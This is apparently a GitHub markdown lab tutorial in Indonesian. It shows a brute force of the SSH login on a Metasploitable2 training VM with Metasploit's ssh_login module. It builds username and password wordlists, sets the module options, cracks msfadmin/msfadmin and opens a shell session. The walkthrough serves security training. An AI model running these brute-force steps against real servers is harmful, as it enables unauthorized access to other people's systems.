Skip to content

Latest commit

 

History

History
99 lines (76 loc) · 2.74 KB

Exploit Port 22 SSH.md

File metadata and controls

99 lines (76 loc) · 2.74 KB

Exploit Port 22 (SSH)

  • Buat file dengan nano yang berisi daftar user untuk uji coba
nano user-metasploitable2.txt

alt text

  • Isi file tersebut dengan daftar user sebagai berikut. Kemudian tekan Ctrl+o lalu enter untuk menyimpan
root
admin
msfadmin
administrator
guest
user
test
postgres
oracle

alt text

  • Buat file dengan nano yang berisi daftar password untuk uji coba
nano password-metasploitable2.txt

alt text

  • Isi file tersebut dengan daftar password sebagai berikut. Kemudian tekan Ctrl+O lalu enter untuk menyimpan
qwerty
1234
admin
12345
msfadmin
123123
12345678

alt text

  • Buka msfconsole di terminal
msfconsole

alt text

  • Cari modul untuk exploit SSH
search ssh

alt text

  • Gunakan modul auxiliary/scanner/ssh/ssh_login untuk brute force SSH login
use auxiliary/scanner/ssh/ssh_login

alt text

  • Tampilkan daftar parameter yang dibutuhkan di modul tersebut
show options

alt text

  • Isi parameter yang dibutuhkan di modul tersebut
set RHOST <IP_metasploitable2>
set VERBOSE true
set USER_FILE /home/kali/user-metasploitable2.txt
set PASS_FILE /home/kali/password-metasploitable2.txt
set STOP_ON_SUCCESS true

alt text

  • Setelah pengisian parameter selesai jalankan proses brute force. Disini kita berhasil login ke SSH dengan username msfadmin password msfadmin yang berada di session 1
run

alt text

  • Akses session 1
sessions -i 1

alt text

  • Disini kita berhasil masuk sebagai user msfadmin

alt text